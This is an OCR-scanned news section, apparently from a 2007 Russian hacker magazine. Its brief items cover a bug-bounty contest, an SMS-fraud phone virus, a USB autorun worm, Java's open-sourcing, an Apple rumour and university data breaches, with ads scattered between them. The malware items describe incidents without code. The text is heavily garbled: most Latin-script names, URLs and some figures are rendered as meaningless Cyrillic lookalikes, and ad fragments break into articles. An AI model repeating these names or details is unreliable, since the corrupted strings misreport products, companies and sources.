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□ у что же, дружище, наконец-то наступило лето. Мы вылезем из своих хакерских берлог и 
будем искать приключения на свою задницу за их пределами. Начинается пора взлома на 
местности: варволкинга, вардрайвинга, крутого фрикинга телефонных сетей, прослушки 
передаваемого банкоматами трафика и многого-многого другого. Лично для меня это 
время года особенное: появляется море свободного времени, хорошего настроения и различныхтусо- 
вок. На этихтусовках обычно заводятся бесценные знакомства, которые переворачивают всюжизнь. 
Кпримеру, именно летом я и познакомился с Никитосом. Омрачает это замечательное время принятие 
нашим уважаемым правительством закона о распитии пива в общественных местах, но пусть это будет 
самое худшее, что нас ожидает в этот период. 

Удачи, хацкер. 



сі Ііпуі, фрикинг-инженер 
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$16 тысяч за хак 

В последнее время стало популярным платить деньги за нахож- 
дение ошибок. Подразделение компании Ѵегізі^п под названием 
Юеіепзе предлагает любому хацкеру $ 1 6 тысяч за нахождение 
удаленной ошибки в одном из следующих приложений: Місгозой 
ЬйетеС Іпіогтагіоп Зегѵег (ИЗ), МісгозоВ: ЕхсЬап^е Зегѵег, Зепбтаіі 
5МТР, ОрепЗЗН ззМ, АрасЬе Ыір или Вегкеіеу ІпСетеС Кате Оотаіп 
(ВІМ)) . При этом ошибка должна содержаться в последней версии 
пакета, разрешается рассматривать только финальные сборки и 
запрещено использовать приемы социальной инженерии. Ну и, 
конечно, ошибка должна быть новой и никем ранее не найденной. 
Если по ночам ты любишь потрошить разные серваки, то теперь у 
тебя есть дополнительный стимул в виде очень хорошей прибавки 
к стипендии. Также победа в этом конкурсе может дать неплохой 
шанс начать карьеру в качестве специалиста по безопасности в 
какой-нибудь компании, раз многие из них готовы платить деньги 
малознакомым людям за тестирование своих продуктов. 



Согласно исследованию АВІ КезеагсЬ, к концу года на планете 
точек доступа. И хоть одна, да будет рядом с твоей квартирой! 



будет 179 500 ѴѴі-Рі 



Вирус шія мобильных 
тырит бабки 

Аты знаешь, что, скачав новую интересную программу для своего смартфо- 
на, ты рискуешь обнулить баланс своего счета? Новый вирус для мобильных 
телефонов маскировали под полезную прогу и распространяли на популяр- 
ных сайтах, посвященных софту для телефонов. Программа прописывалась 
в системных файлах ЗутЪіапОЗ и начинала отправлять зтз-сообщения на 
короткий номер 1055 . Зтз’ка на этот номер оказывалась платной, и с твоего 
счета снималось 177 рублей. Откуда простой злоумышленник получил 
короткий номер? Все просто — эти номера сдаются операторами в аренду 
и стоят довольно дорого, поэтому контент-провайдеры раздают номера в 
субаренду кому попало, чем и воспользовался хацкер. Часть из этих 
177 рублей оседала в качестве платы за субаренду, а другая часть переходила 
в карман хакеру. Это не первый случай применения короткого номера для 
воровства денег — с февраля прошлого года многим приходило сообщение 
с предложением отправить зтз на короткий номер и получить немного 
халявного мобильного интернета. Естественно, кро ме потери денег, это 
ни кчему не приводило. Так что будь внимателен и не качай всякую гадость 
себе на телефон. 





У тебя есть флешка? Вот лично у меня их две. Да и у большинства сегод- 
ня хоть одна, да есть. А единственным человеком, при мне проверив- 
шим флеху на вирусы, был препод в моем универе. Но даже это может 
не спасти его от нового вируса, написанного специально для ШВ-уст- 
ройств. Его окрестили \У32/5і11уРЭ; он автоматически заражает ІІ5В- 
устройства хранения данных и прописывается на каждый компьютер, 
в котором окажется зараженный брелок. При заражении на флехе 
создается скрытый файл аіЛогип.іпІ, который и позволяет творить 
такие бесчинства. Единственной гадостью, которую делает этот вирус - 
няк, является смена всех заголовков в ІЕ на «Наскеб Ьу 1ВУТЕ», но по 
схожей технологии можно сделать что угодно, сам понимаешь. Сразу 
могу предложить простой способ защиты — проверку всех флешек ан- 
тивирусом. Но при этом авторан должен быть выключен, а то проверка 
не поможет . Здесь мы в очередной раз становимся свидетелями 
того, как развитие технологий приводит к появлению новых способов 
распространения вредоносных программ. 
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ТІШ5РОКМЕК5 ЕсМоп 



Эксклюзивная игра 
ТРАНСФОРМЕРЫ, а также 
картинки и мелодии 
в комплекте — только 
в специальной упаковке 



ІМОКІА 

№егіе5 




Это другая форма жизни 

Это 



В КИНОТЕАТРАХ С 4 ИЮЛЯ 



РКЕАІ\ШЖК8 

РІСТЦКЕ8 




: ІтоОетогІн о( НаіЬго. 






Ѳ 2007 РагалдаМ РІОигеі СогрогаІІоп апй ОгватѴѴогМ НС. 

АН КідМ КеаегѵеО. 




Реклама. Все права защищены © Иокіа, 2007. Иокіа, Иокіа СоппесСіпд Реоріе являются зарегистрированными торговыми марками ГІокіа СогрогаІІоп. *Издание ТРАНСФОРМЕРЫ. 
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Вскрытие ^ѵа 

На конференции ІаѵаОпе в Сан-Франциско компания 5ип 
сделала доступным исходный код Іаѵа. Причем доступен он 
стал не по лицензии СЭПЬ, по которой открыты исходные коды 
операционки Зоіагіз, а по лицензии СРЬѵ2. Сразу оговорюсь, 
что доступны не 100% строк кода — некоторые части, отве- 
чающие за графический рендеринг шрифтов и технологию 
Іаѵа 20, написаны другими компаниями и открыты не будут. 
Взамен них прикрутят уже существующие ореп зоигсе аналоги. 
Что это дает простым пользователям типа нас с тобой? То, что 
теперь открытая среда и интересные разработки на ее основе 
будут включены во многие дистрибутивы Линухов, а не только 
в сановскую Солярку. Об открытии исходников разговоры 
шли целый год, еще с прошлогодней конференции ІаѵаОпе 
2006, а первые строки кода стали доступны уже в ноябре 2006 
года. Стоит заметить, что за всю историю открытие Іаѵа стало 
самым крупным пожертвованием кода ореп зоигсе сообщест- 
ву. Возможно, это послужит примером и для других разработ- 




ТНіпІс 

/ 



Лрріг Сіі'ГП^ЦИТ, І пс. 



Как просрать $4 мпрп 

Причем не свои 4 миллиарда :) . На популярном техническом блоге 
Еп§а(і§е1; опубликовали якобы достоверную информацию о том, что 
Арріе задерживает выход іРЬопе и операционной системы Мае 05 10.0 
Ьеорагб на несколько месяцев. Эти сведения были предоставлены «ав- 
торитетным» источником из компании Арріе. Был даже приведен текст 
емейла из внутренней рассылки, в котором работников компании опове- 
щают об этой задержке. Несмотря на то что официальные источники эти 
слухи очень быстро опровергли, инвесторы мгновенно отреагировали 
на эту новость, продав на фиг акции компании. В результате этого акции 
ААРЪ за 6 минут упали в цене на 2,7%: с $107,89 до $103,42. Такое резкое 
падение привело к потере более $4 млрд рыночной капитализации 
компании. Но через некоторое время, осознав свою ошибку, доверчивые 
акционеры стали покупать акции обратно, практически вернув их цену 
на первоначальный уровень. Я предполагал, что на подобных ресурсах 
не всегда абсолютно достоверные новости, но то, что на них может быть 
такая реакция инвесторов, для меня откровение. 





На первом месте в списке самых крупных выплат директорам американских компаний 
находится Стив Джобс с суммой $ 646,6 МЛН. ВоттебеиОгрызок... 



Зарядим все! 

Хорошо, когда из мобильных устройств у тебя только телефон — особо 
париться с зарядкой не приходится. Но что делать, когда у тебя еще 
плеер, гарнитура, КПК? Путаница в проводах и постоянная нехватка сво- 
бодных розеток тебе обеспечена. Для решения этой проблемы существу- 
ет специальный девайс — зарядное устройство СКаг^ероб от компании 
Саііросі, которое может заряжать до шести устройств одновременно. 
Зарядка происходит с помощью дополнительно подключаемых модулей, 
выбрать которые пред лагается самому покупателю. Из недостатков 
можно указать то, что это устройство не может заряжать ноутбуки, но 
и имеющихся возможностей вполне достаточно, чтобы избавиться от 
приличного количества проводов в квартире. Дополнительно можно 
докупить переходник, позволяющий подзаряжаться от бортовой сети 
автомобиля. Покупатель выложит $50 за само устройство и по $10 за 
каждый модуль с переходником. Но, к сожалению, о начале продаж этого 
устройства в России пока ничего неизвестно. 
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Дополнительные материалы можно найти на сайте даѵѵѵѵ.тісговой.сот/гиз/^еііііеіасіз 



Місгозой 



брелѵя надежны^ решений 




М/Ш00И/8 8ЕКѴЕВ 

обгоняет шцх 






®й*еійа[® 
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Том Нэги для «Времени надежных решений» 

СОШТОКОМ, легендарный полигон Сопііпепіаі АС 

в окрестностях Ганновера, Германия. 

ГОРЯЧИЕ НОВОСТИ: 

«\ѴішІоѵѵ5 Зегѵег обеспечивает 
надежную среду с возможностью 
централизованного 
администрирования и управления». 



Паулъ Швефер, 

директор по информационным 
технологиям Сопііпепіаі АС 



Новая информационная система гарантирует ведущему 
поставщику продукции для автомобильной 
промышленности 99,9% надежность 

Майкл Беттендорф 



ГАННОВЕР, январь 2007 г. - 
«Нам была нужна абсолютная 
надежность, недостижимая 
с нашей прежней системой», - 
говорит Пауль Швефер, 
директор по информацион- 
ным технологиям корпорации 
Сопііпепіаі АО, одного из 
крупнейших поставщиков 
продукции для автомобильной 
промышленности со штатом 
85 000 сотрудников по всему 
миру. Несовершенные инстру- 
менты управления не 
позволяли команде Швефера 
поддерживать работоспособ- 
ность системы на том 
высоком уровне, который 
требуется Сопііпепіаі АС, 
поэтому была необходима 
смена платформы. 

Сначала рассматривалось 
решение на базе Ійпих. 
Однако после тщательной 
оценки команда Швефера 
пришла к заключению, что она 
не может обеспечить надеж- 
ную и прогнозируемую среду, 
необходимую Сопііпепіаі АО. 
И в результате они выбрали 
МісгозоП® \Ѵіпс1о\ѵ8 Зегѵег® 
2003. 

Наличие мощных средств 
оптимизации и настройки. 



включая управление группо- 
выми политиками, позволило 
Швеферу сделать вывод 
об очевидных преимущест- 
вах \Уіпс1о\ѵ8 Зегѵег® 2003 
в сравнении с Ьіпих. 
«\Ѵіпііоіѵ8 Зегѵег обеспечивает 
надежную среду с возмож- 
ностью централизованного 
администрирования и упра- 
вления», - говорит Швефер, 
уверенный, что безукориз- 
ненная управляемость служит 
залогом высокой надежности. 
«Воссоздание подобного уровня 
сервиса в среде Ппих было бы 
сложным и дорогостоящим 
делом», - утверждает он. 

Принятое решение полно- 
стью себя оправдало. С момента 
внедрения ХѴішЗоѵѵз Зегѵег 2003 
поддерживает 99,9% надеж- 
ность распределенной среды 
компании Сопііпепіаі АО. 

Подробнее ознакомиться 
с опытом Сопііпепіаі АО 
и другими практическими 
примерами, а также с резуль- 
татами независимых срав- 
нительных исследований 
\Уіпсіо\ѵ8 Зегѵег и Ііпих 
можно на сайте 
\ѵтететісго8ой.сот/гиз/§еІіЬеіасІ8 



ГОРЯЧИЕ НОВОСТИ: Настроение ІТ-профессионалов 
напрямую связано с надежностью 

Подтверждая глобальную тенденцию, ІТ-профессионалы, такие, как 
директор по информационным технологиям корпорации Сопііпепіаі АО 
Пауль Швефер, выражают удовлетворение (см. выше) высокой 
надежностью ХѴіпсіохѵв Зегѵег. Продолжение на 3 стр. 



Реклама 



© 2007 МісгозоГі Согрогаііоп. Все права защищены. Владельцем товарных знаков МісгозоГі и \Ѵіп<Го\ѵз Зегѵег, зарегистрированных на территории США и/или других стран, и владельцем авторских прав на их дизайн является корпорация МісгозоГі. 
Другие названия компаний и продуктов, упомянутых в тексте, могут являться зарегистрированными товарными знаками соответствующих владельцев. 
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Кликни здесь — получишь вирус 



Интересный эксперимент был проведен специ- 
алистом по компьютерной безопасности Дидье 
Стивенсом. Он разместил в контекстной системе 
рекламы Соо§1е рекламное сообщение с фразой: 
«Ваш компьютер еще чист от вирусов? Тогда 
заразите его здесь ! » Сообщение успешно прошло 
модерацию в Гугле и было продемонстрировано 
260 тысяч раз. Казалось бы, подобный текст дол- 
жен отпугнуть любого, но за все время показов по 
рекламе перешли 409 раз. Можно предположить, 
что часть перешедших включала специалистов 
в области безопасности, часть просто заин- 
тересовалась, а кто-то ткнул случайно. Дидье 



потратил всего 23 доллара на показы, из всех 
показов в 0,16% случаев по рекламе переходили, 
а стоимость этого перехода для Дидье была всего 
6 центов. По результатам эксперимента можно 
сделать вывод, что каким бы бессмысленным 
или отталкивающим ни было объявление, оно 
все равно найдет свою аудиторию. Я в свою 
очередь замечу, что тоже бы перешел по такому 
объявлению — я практически уверен в безо- 
пасности своего браузера, и все мои походы по 
«неблагоприятным» районом интернета никогда 
не приводили к заражению, а что скрывается за 
такой рекламой — узнать интересно :) . 




ЕОСЕ'фикация Московского 
региона 




Группа компаний «ВымпелКом» (работающая под известным тебе торговым знаком 
«Билайн») закончила внедрение технологии высокоскоростной передачи данных ЕБСЕ 
в сети «Билайн» Московского региона. Теперь в любой точке Москвы ты, вооружившись 
телефоном с поддержкой ЕОСЕ, подключенным к «Билайну», можешь серфить инет при- 
мерно в 2-2,5 раза быстрее, чем по обычному СРК5. Кроме этого, для передачи данных в 
сети «Билайн» выделил отдельный канал, не зависящий от объема голосового трафика. 
Если твой телефон не поддерживает ЕЭСЕ — не расстраивайся! В связи с внедрением но- 
вой технологии, позволяющей работать с более современными и высокоскоростными 
схемами кодирования, скорость обычного СРК5 удалось повысить на 50%. Что касается 
других регионов, то там высокие технологии тоже активно внедряются — в общей слож- 
ности, порядка 70% базовых станций использует ЕЭСЕ для передачи данных. Мобиль- 
ный интернет идет в массы ! 



Домен рогп.сот продан за 

$9 МЛН. 



Компания Арегіо Тесйпоіо^іез создала «первый в мире терапиксельный снимок», тупо 
совместив 225 фоток раковой опухоли. Получилась картинка весом Л 43 гигабайта. 




Мобильная 

играбельность 

Много производителей пытается прорваться на рынок трЗ-плееров, 
благо рынок развивающийся и довольно большой. Вот и корейцы решили 
не отставать от других и предлагают твоему вниманию новое средство 
воспроизведения звука и видео в полевых условиях — компактный 
шрЗ-плеер Кішііх КГ-8600. Это маленькое устройство весом всего 
40 грамм оснащено жидкокристаллическим дисплеем на 262 тысяч 
цветов, который занимает почти всю лицевую панель. При этом кнопки 
управления располагаются на торцевой стороне. Несмотря на размеры, 
изображение на экране очень четкое. Звук также не уступает — гром- 
кость и детальность тебя приятно удивят. Помимо простого воспроизве- 
дения, плеер еще умеет записывать звук с радио и микрофона и напрямую 
его кодировать. «Кореец» предлагается в четырех вариантах: от512Мбдо 
4 Гб памяти и стоимостью до 4000 рублей за самую объемную модель. 
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сІиБ 

трЗ.затзипд.ш 

Представь... музыка без проводов 



0 ВІиеІооШ 



Беспроводные наушники не входят в комплект. 



С новым плеером Затзипд ІЫОІСІО ты можешь не только наслаждаться музыкой 
в беспроводных наушниках, но и обмениваться мультимедийными файлами 
с другими устройствами, оборудованными ВІиеІооШ: компьютером, телефоном 
или плеером. Затзипд ІШІСО - прямой контакт с музыкой. 

• Поддержка беспроводных наушников 

• Обмен файлами* 

• Поддержка МРЕ04 (видео) и ТХТ файлов 

• РМ-тюнер с возможностью записи 

• 30 часов без подзарядки 



" при обновлении прошивки ѵег 1.60 (доступно с марта 2007 г.) 






Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 



Галерея Затзипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. \л/\л/ѵѵ.затзипд.ги. Товар сертифицирован. Реклама. 
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«Коробку» забанили 

Многих очень не радует стоимость диска с иг- 
рой для приставок, в том числе и для ХЪох 360. 
Но пираты не дремлют — уже давно прода- 
ются пиратские диски по «народным» ценам. 
Но чтобы ими воспользоваться, приставку 
необходимо зарядить специальной версией 
прошивки, которая позволит считывать 
незащищенные диски. При этом пользова- 
тель прошитой версии «коробки» был никак 
не ограничен и в использовании онлайновых 
ресурсов, доступных владельцам ХЪох 360. Но 
недавно МісгозоЛ решила положить конец по- 
добному беспределу — у многих владельцев 



прошитых приставок при входе на сервис Ьіѵе 
появляется сообщение об ошибке и надпись 
о том, что консоль забанена. При этом сам 
аккаунт остается и продолжает быть доступ- 
ным с непрошитых «коробок», а на прошитых 
можно продолжать играть в пиратские игры, 
но только в оффлайне. Раз в Мелкософте взя- 
лись за борьбу с пиратством на ХЪох, значит, 
оно достигло критических для них величин. 
Стоит ожидать как новых способов воздейс- 
твия на владельцев прошитых приставок, так 
и новых версий прошивок, которые будут эти 
способы обходить. 





Кошаки против 
клавиатур 

Те, у кого дома живет кошак, подтвердят: это животное очень любит ходить по 
клавиатуре или просто на ней дрыхнуть. Приучить животное этого не делать не 
так-то просто, да и лень, в общем. Но в результате подобного поведения питомца есть 
возможность потерять всю работу задень, да и шерсть из клавиатуры выковыривать 
— не самое большое удовольствие. Для предотвращения подобных эксцессов была 
разработана прозрачная крышка для клавиатуры Кіпу КеуЪоагб Соѵег, которая закры- 
вает клаву сверху, не мешая при этом котику спокойно спать на ней. Крышка выпус- 
кается двух размеров, которые вполне удовлетворят рядовых пользователей. Если 
не хочется покупать крышку, то можно воспользоваться специальной программой 
РаѵѵЗепзе, которая по нажатию клавиш определяет, какое существо произвело это 
нажатие — человек или кошка. Если будет установлено, что клавиатурой пользуется 
кошак, то клава будет заблокирована во избежание потерь данных или других непри- 
ятностей (может, котик захочет посмотреть немного эротики с кисками :)) . (Все это, 
конечно, очень здорово придумано, но, к сожалению, вряд ли спасет клаву, если твой 
пушистый/лысый домочадец решит воспользоваться ей как туалетом : (. Проверено 
на себе. — Примечание редактора.) 



Самый крупный в мире Б^-сервер зесигезегѵег.пеі: содержит 10590591 

доменных имен. 



Мультиязычный ПОИСК ОТ кх Дс 



При поиске очень редкой информации в интер- 
нете вероятность того, что она будет именно 
на твоем языке, довольно мала. Ведь нельзя 
исключать, что где-нибудь в далекой Корее 
существует целый портал на корейском языке, 
который как раз тебе необходим. В компании 
Соо§1е это понимают и в скором времени 
представят широкой публике новый межъязы- 



ковой поисковый сервис. Запрос в поле поиска 
автоматически переведется на другие языки, 
потом по этому переводу будет производиться 
поиск на иностранных ресурсах, после этого 
результаты поиска будут переведены обратно 
на родной язык. В качестве примера работы 
сервиса компания представила скриншот, на ко- 
тором с одной стороны были результаты поиска 



на арабском языке, а с другой — английские 
аналоги. Также этот сервис будет полезен лю- 
дям, которые общаются на редких языках, давая 
им возможность искать информацию на более 
распространенных языках. Единственным и 
пока серьезным минусом является качество 
перевода, но с увеличением популярности этот 
недостаток должен стать не так заметен. 
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НА ПРАВАХ РЕКЛАМЫ 




Подробности на сайте <■.- ■ 

\л/\л/\л/.оѵіРЮкоз.ри :>" ■ 
и по телефону горячей линии 
8-800-200-04-20 



ВЫМПЕЛ 

РЕЛЬСОУКЛАДЧИКА 
ОВИЛ ПОКОС 



ПАРОВОЗНАЯ 

ПУШКА 



КОМПЛЕКТ ' 
ДИДЖЕЙСКОЙ 
АППАРАТУРЫ 



1 ИЗ 20 
БИЛЕТОВ 
НА ДВОИХ I 
НА ПАРОВОЗ 
ОВИП ПОКОС 



АКЦИЯ С 1 МАЯ ПО 31 ИЮЛЯ! 

Найди код под крышкой бутылки пива «Сокол светлое» или «Сокол джингл» 0.5 л. 

Пошли его в смс-сообщении на номер 4007* или активируй его через сайт - отправив 1 код, 
ты автоматически включаешься в розыгрыш призов. Каждый код под крышкой-номер 
виртуальной рельсы, положив которую, ты можешь проложить дорогу Паровозу Овип 
Покос, который заберет тебя в радостное путешествие по стране. Клади рельсы и участвуй 
в розыгрыше. Ты можешь получить Паровозные картинки и рингтоны за 1 код, Паровозный 
СО с эксклюзивными миксами за 5 кодов или Вымпел Рельсоукладчика Овип Покос за 
10 кодов. Розыгрыши СО проводятся каждые 10 минут, розыгрыши вымпела проводятся 
каждый час. А также ты можешь получить Паровозную пушку за отправленные 1 5 кодов. 
Каждый день в розыгрыше - 3 пушки. У тебя есть шанс получить в подарок комплект 
диджейской аппаратуры или 1 из 20 билетов на двоих на Паровоз Овип Покос. 



ПАРОВОЗНЫЙ СО 
С ЭКСКЛЮЗИВНЫМИ 
МИКСАМИ 



'Стоимость запроса на номер 4007: Мегафон - 3 рубля без НДС 
Билайн, МТС - 2,87 рубля без НДС. Стоимость сообщения 



для абонентов других операторов смотрите 
на официальном сайте акции: шшш.оѵшіоко: 



ЕБЛЕН 




ггі ед ап 5 



Аудитория рунета достигла 



25 



мл н человек. 




Непропвинутый судья 

В суде лондонского района Вулич слушалось дело трех подростков-му- 
сульман, обвиняемых в распространении исламистской пропаганды 
через интернет. Вести это дело поставили судью Питера Оупеншоу, 
который остановил рассмотрение дела во время выступления свидете- 
лей, заявив: «Проблема в том, что я не понимаю, о чем речь. Я реально не 
понимаю, что такое веб-сайт». Судье-недоучке пришлось прямо в зале 
прочитать спецкурс по интернет-технологиям и популярно объяснить, 
что такое браузер, ІР-адрес и вообще интернет. Подобные казусы в анг- 
лийских судах не редкость — уже были судьи, которые не знали названий 
популярных сетей супермаркетов, предметов интерьера и не понимали, 
кто такие телепузики. Мне кажется, что при рассмотрении более слож- 
ных технических дел судьи все-таки прибегают к помощи технических 
консультантов, а в этом случае все полагали, что, уж что такое интернет, 
судья должен знать. Налицо простое нежелание глубоко разбираться в 
сути вопроса до заседания, иначе судья смог бы легко получить консуль- 
тацию у любого прохожего. . . 



Новые п 
от 



вые проекторы 
Ѵіеѵѵбопіс 



Компания ѴіеѵѵЗопіс выпустила 6 новых моделей проекторов, которые 
подойдут для использования как дома, таки в офисе, и даже в дороге. 
Бюджетный сегмент представляют многофункциональные модели 
Р1503П, Р1506Э и Р15560, которые, не сильно опустошая кошелек, 
позволят насладиться всеми возможностями просмотра видео и другого 
контента через проектор. Р1568Б и Р15880 — высокопроизводительны, 
с большим количеством входов и возможностью просто выдернуть шнур 
питания, а не ждать, пока остынет лампа. Эти модели более всего подой- 
дут для требовательных корпоративных нужд проведения презентаций и 
конференций. Замыкает серию новинок проектор Р1358, который отно- 
сится к портативному сегменту. Эта модель весит меньше 2 килограмм и 
позволяет проектировать изображения с расстояние всего 1,5 метра на 
60-дюймовый экран. Благодаря новой электронной начинке проектор 
готов к работе уже через несколько секунд после включения, имеет защи- 
ту на базе РШ-кода и оборудован детектором движения. Из такого списка 
новинок каждый сможет выбрать проектор для своих нужд. 
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Реклама поможет не умереть 
от жажды! 

Вот идешь ты по улице. Жарко, солнце светит. И вдруг замучила тебя 
жажда, а денег на любимую банку газировки, как назло, не хватает. 
Если бы ты был в Японии, то смог бы утолить свою потребность в 
жидкости со скидкой, а то и вовсе бесплатно. Но для этого тебе при- 
шлось бы посмотреть 30-секундный ролик о новейших достижениях 
в области производства памперсов для котят. Арех — оператор сети 
торговых автоматов по продаже прохладительных напитков — уже 
в ближайшем будущем собирается установить в наиболее людных 
местах Токио новые автоматы, проигрывающие рекламные ролики 
во время приготовления напитков, а также наливающие их в бумаж- 
ные стаканчики с рекламой. По интересной дороге мы идем: сначала 
напитки с рекламой, потом можно будет покушать в кафе бесплатно, 
но во время еды непрерывно слушать рекламу. А идея бесплатной 
мобильной связи, где разговор прерывается на рекламные ролики, 
уже давно витает в воздухе. Это может привести к тому, что в скором 
времени мы будем платить не за услуги и товары, а за то, чтобы полу- 
чать их без надоедливой рекламы. 

ѴѴеЬ-камера доія общения 

Торговая марка А4Тес1і представила нам ѵѵеЬ-камеруА4Тес1і РК-336. Мы 
ее достаточно тщательно протестировали: использовали в ходе нашей 
вечеринки ІООхРагіу для трансляции экстремального разгона на проек- 
торе. Камера отлично справилась с этим заданием. 

Расскажу о характеристиках новинки. 

В камере установлена 1/4" матрица с разрешением 640x480, а фокусное 
расстояние возможно менять от 10 сантиметров до бесконечности. При 
съемке видео камера умеет писать ролики с Ігатеііаге'ом ЗОфз, при этом 
угол обзора по горизонтали будет 54 градуса. Что касается фотосъемки, 
камера умеет изготавливать фотографии, экстраполируя их размер до 
1.3 мегапикселя. 

РК-336 можно смело рекомендовать для использования совместно со 
скайпом и любыми другими программами интернет-общения. Если она 
выдержала экстремальную Х-вечеринку, то уж при работе со скайпом 
точно никаких проблем не будет :) 
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Хакерский привоп 

Компания ЬС представила новый привод С5А-Н55Ы/Ь Зирег Миій 
ОѴБ Кеѵѵгііег, который позволит тебе записывать защищенные от 
копирования и закрытые для доступа третьих лиц оптические диски. 
Используя новую технологию ЗесигОізс, привод может не просто 
защищать данные на диске паролем, но и использовать еще несколь- 
ко полезных функций. Например, добавлять к данным цифровую 
подпись, проводить проверку целостности данных с помощью конт- 
рольных сумм, защищать от копирования рсК-файлы на ОѴЛ-дисках. 
Стоит отметить, что и до этого существовали приводы, способные 
шифровать информацию, но благодаря этому девайсу можно быть 
спокойным не только за конфиденциальность данных, но и за их 
сохранность. Кстати, технология ЗесигПізс была разработана совмес- 
тно с компанией Иего, чьей программой ты наверняка пользовался 
для прожига болванок. Остальные возможности резака тоже не были 
обделены вниманием — он оснащен самыми современными система- 
ми записи СЭ- и БѴБ-дисков всех форматов, а также развивает самую 
большую скорость записи на ШТ) + К среди аналогов — 20х. Продажи 
в России стартовали в мае этого года. 



По прогнозам еМагкеіег, в 2011 году 
на рекламу в социальных сетях могут 



потратить около $ 2,5 млрд. 

Не просто так нас туда заманивают.. . 



Цензура в Сети 

Существует ли в интернете цензура? С моей или твоей точки зре- 
ния, никакой цензуры нет. Но так ли это на самом деле? Междуна- 
родная группа экспертов из четырех университетов (Кембриджско- 
го, Оксфордского, Гарвардского и Университета Торонто) в рамках 
проекта «Инициатива открытой сети» провела исследование 
по этому вопросу. В ходе исследования было проанализировано 
несколько тысяч сайтов, предоставляемых 120 провайдерами в 
41 стране. Оказалось, что в 25 странах (особенно в Иране, Сирии, 
Саудовской Аравии и Пакистане) интернет проходит жесткую 
цензуру, в результате которой доступ к некоторым сайтам просто 
перекрывается. Ну кто бы сомневался... Кроме этого, ограниче- 
ния присутствуют и в таких странах, как Индия, Китай, Тайланд 
и Южная Корея. Например, южнокорейские провайдеры не дают 
своим пользователям посещать ресурсы, посвященные КНДР. При 
этом США, Япония и другие развитые страны не участвовали в этом 
исследовании. Интересно, почему? 
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С 4 июня по 1 5 июля приобретая в «Связном» 
мобильные телефоны Затзипд ЕЗОО, 
Е480, Е390 или Е200, вы можете выиграть 
один из четырех автомобилей РеидеоГ 

Подробности акции на ѵѵѵѵѵѵ.зѵуагпоу.ги 
или по телефону: 8-800-2002-802 



СВЯЗНОЙ С 










тедапеѵг 



>> 



Корпорация МісгозоЛ купила доменное имя 
М51Ч.КІІ у его бывшего владельца Романа 

Эльхаджиева за $1 млн. 




Поделись компом с ближним 

В Индии на всех компьютеров 
категорически не хватает, поэтому 
индийское К&И-подразделение 
Мелкософта решило помочь 
людям приобщиться к прекрасному 
миру ѴѴіпсіоѵѵз с помощью новой 
технологии, которая делит экран 
на две части. Причем делится не 
только монитор, но и все остальные 

ресурсы компьютера. При этом к нему подключаются две клавиатуры, две 
мышки и загружаются две различные копии винды. Пользователям разре- 
шается залезать своим курсором на половину соседа и творить там полный 
беспредел... Могу предположить, что подобная технология хорошо бы 
прижилась у нас в институте, где очень любят сажать по 2 и более персонажа 
за один компьютер, аужв индийских школах и университетах — и подавно. 
Кроме институтов, эта технология вполне применима и при совместной 
разработке. Учитывая все плюсы, я все же не могу представить совместную 
работу на одном 15-дюймовом мониторе, которыми обычно комплектуют 
лабораторные классы. Поэтому одному челу придется делать лабораторную 
работу, а остальным тупо втыкать в процесс со стороны. 



Подрастает смена 
«проблеме 2000» 



Я до сих пор помню, как в 1999 году на полках магазинов, торгующих 
компьютерными принадлежностями, лежали очень интересные 
РСІ-платы, после установки которых компьютер становился неуязвим 
для «проблемы 2000». Но ничего страшного не произошло и без этих 
замечательных плат. Однако теперь грядет «проблема 2038». Касается 
она представления времени в ТЖІХ-системахпо стандарту Р05ІХ. Дело в 
том, что по этому стандарту время отображается как количество секунд 
от 1 января 1970 года. Поскольку на 32-битных системах для хранения 
времени используется стандарт зі^песі іпі (32-битное целое со знаком), 
то самой поздней датой для такого формата является вторник, 19 января 

2038 года, 03:14:07. Эта проблема 
касается только 32-битных 
систем, поскольку в 64-битных 
для представления времени уже 
введен 64-битный формат. Но в 
32-битных системах подобную 
замену сделать невозможно 
— это нарушит бинарную сов- 
местимость программ, храни- 
мых данных и много чего еще. 
Предполагается, что к 2038 году 
переход на 64-битные системы 
уже завершится, и этой проблеме 
не уделяется особого внимания, но скептики утверждают, что 32-битные 
системы еще поживут. Грядет очередное шарлатанство :) . 




Самым богатым блоггером в мире, по оценкам ѴѴогЫѵѵісіе Зиссезз, стал Стив Павлина. Стои- 



мость его блога о персональном развитии составляет 



$5 475 000. 




Почти паром 

Компании МабТих и Ѵесюг Ііпих представили системный 
блокпо удивительной цене — всего $139. Клавиатура, мо- 
нитор и оптический привод в комплект не входят, но все рав- 
но цена заставляет задуматься. Конфигурация системника 
позволяет без проблем работать на предустановленной опе- 
рационке — Ѵесіог Ііпих. Внутри находится процессор Ѵіа С 7 
счастотой 1,5 ГГц, 256 метров оперативки и 13,5-гиговый 
жесткий диск. В комплекте также имеется сетевая карта 
и встроенная звуковая плата. Такой системник хорошо 
ставить на рабочие места, где требуется выполнение только 
простых операций: работа с документами, обработка 
почты. Со своей стороны могу сказать, что использовать 
такой компьютер можно, например, для общения по аське и 
серфинга веба, пока на основном компьютере выполняется 
какая-либо более ресурсоемкая задача. О продаже этого 
десктопа в России пока ничего неизвестно, но думаю, что у 
нас он пользовался бы гораздо большим спросом, если бы на 
нем была установлена хотя быѴѴіпбо\ѵ5 98. Ілпих’ы в качест- 
ве десктопных систему нас очень непопулярны. 



Похакали универы 

У нас в институте все сайты и тому подобные вещи дела- 
ются исключительно силами студентов. Естественно, 
особого качества от них ожидать не стоит. Судя по всему, 
подобным образом был разработан и сайт Университета 
Миссури, через дырку на котором недавно удалось ута- 
щить большое количество персональных данных студен- 
тов и сотрудников института. Всего было украдено 
22,4 тысячи записей из базы данных. В результате внут- 
реннего расследования было установлено, что данные 
были стырены хакерами из Китая и Австралии. Единс- 
твенное, что удалось сделать в этой ситуации, — это 
предупредить студентов, чтобы они следили за своими 
банковскими счетами. Так же отличился и колледж Гошен 
в Индиане — там была украдена личная информация о 
7,3 тысячи учеников. Администрация колледжа даже об- 
ратилась за помощью в специальные агентства, которые 
займутся мониторингом банковских счетов студентов. 
Благодаря тому, что удалось точно установить, какие 
записи пропали, ущерб оказался не столь критичен. В 
противном случае считалась бы украденной вся база 
полностью — тогда пришлось бы мониторить уже сотни 
тысяч банковских счетов. 
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Реклама в играх от Соодіе 



В последнее время стали очень часто разме- 
щать рекламу в компьютерных играх. Причем 
не только ргосіисі: ріасетепі:, как, например, 
телефон популярной марки в руках Сэма 
Фишера, но и обычные рекламные плакаты 
